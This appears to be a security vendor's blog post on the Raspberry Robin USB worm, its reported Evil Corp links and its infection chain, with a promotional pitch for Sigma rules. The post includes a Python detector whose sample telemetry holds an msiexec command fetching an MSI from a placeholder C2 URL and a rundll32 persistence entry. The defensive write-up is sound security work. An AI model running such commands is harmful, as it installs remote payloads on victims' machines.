Raspberry Robin Malware Detection: New Connections Revealed

Raspberry Robin Malware

In late July, Microsoft researchers released new evidence linking the Raspberry Robin Windows worm to the activity of the Russia-backed Evil Corp gang. Raspberry Robin, a USB-based worm designed as a malware loader, shows functionality and structural elements similar to those of the Dridex malware, indicating that the notorious Evil Corp group may be behind the new wave of attacks.

In 2019, the US Department of the Treasury sanctioned this prolific cybercriminal organization for Dridex malware attacks that caused more than $100 million in damages.

Raspberry Robin Malware Detection

To proactively defend against Raspberry Robin infection, SOC Prime professionals released context-enriched Sigma rules:

Sigma rules to detect the malicious presence of Raspberry Robin malware

The rules are aligned with the MITRE ATT&CK® framework v10 and are compatible with the 26 SIEM, EDR, and XDR solutions supported by SOC Prime’s platform.

SOC professionals dedicated to keeping up with the latest trends shaping the current cyber threat landscape can benefit from leveraging SOC Prime’s industry-first Cyber Threats Search Engine. Press the Explore Threat Context button to instantly navigate the pool of detection algorithms enriched with ATT&CK mapping and advance your proactive Threat Hunting routine.


Raspberry Robin Malware Analysis

In its disclosure of July 26, 2022, the tech giant reveals that the number of observed infections in the wild has reached the millions, and that until recently the attacks had no clear post-exploitation objectives. Since this cluster of activity was detailed by Red Canary in September 2021, Raspberry Robin, also known under the moniker QNAP Worm (for its initial abuse of QNAP devices), has kept its tricks up its sleeve. Last month, security researchers detected the infections delivering FAKEUPDATES malware, also known as SocGholish, linking the attacks to DEV-0206 and DEV-0243 (aka Evil Corp).

Raspberry Robin’s infection process starts with compromising a device through a malicious Microsoft shortcut (.LNK) file, normally delivered via a USB device. When the victim-to-be opens the file, an MSI installer is fetched from a C2 domain and executed. To establish a foothold within the infected system, the malware creates a registry key, ensuring that the same DLL is injected into rundll32.exe after each boot.
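As an added illustration of how the two host-side stages of that chain can be picked up in endpoint telemetry (not code from SOC Prime or from the Sigma rules referenced above), the following Python checks simplified Sysmon-style events for an msiexec install from a URL and for an autostart registry value that launches rundll32.exe with a DLL. The event shape, the file paths, the URL and the Run key location are all constructed assumptions; the article itself only says "a registry key".

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape (EventID 1 = process
# creation, EventID 13 = registry value set). All paths, URLs and key names are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\alice\Downloads\7z2201-x64.msi /qn"},   # benign local install
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /q /i http://c2-placeholder.invalid:8080/setup.msi"},  # MSI fetched from a URL
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},  # benign autorun
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\svchst",
     "Details": r"rundll32.exe C:\ProgramData\stage2.dll,DllEntry"},  # DLL re-loaded into rundll32 at logon
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)

def is_remote_msi_install(event):
    """msiexec installing a package given as a URL rather than a local path."""
    if event.get("EventID") != 1:
        return False
    if not event.get("Image", "").lower().endswith("\\msiexec.exe"):
        return False
    return bool(URL_RE.search(event.get("CommandLine", "")))

def is_rundll32_autorun_dll(event):
    """An autostart registry value that launches rundll32.exe with a DLL argument.
    The Run key is an assumed location; the article only mentions 'a registry key'."""
    if event.get("EventID") != 13:
        return False
    if "\\currentversion\\run\\" not in event.get("TargetObject", "").lower():
        return False
    details = event.get("Details", "").lower()
    return "rundll32" in details and ".dll" in details

RULES = [("remote_msi_install", is_remote_msi_install),
         ("rundll32_autorun_dll", is_rundll32_autorun_dll)]

def detect(events):
    """Return (rule_name, event_index) pairs for every event that matches a rule."""
    hits = []
    for idx, event in enumerate(events):
        for name, check in RULES:
            if check(event):
                hits.append((name, idx))
    return hits

if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name}: event {idx} -> {SAMPLE_EVENTS[idx]}")
```

Both checks are deliberately narrow and will not catch a loader that uses a different autostart location or stages the MSI to disk first; they are a starting point for tuning against your own telemetry, not a replacement for the published rules.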

Enhance your chances of reducing dwell time and nullifying the adversaries before the damage is done by utilizing innovative tools and solutions delivered by a team of dedicated professionals from SOC Prime. Register for upcoming online events and check out a vast collection of educational materials available in the Cyber Library.
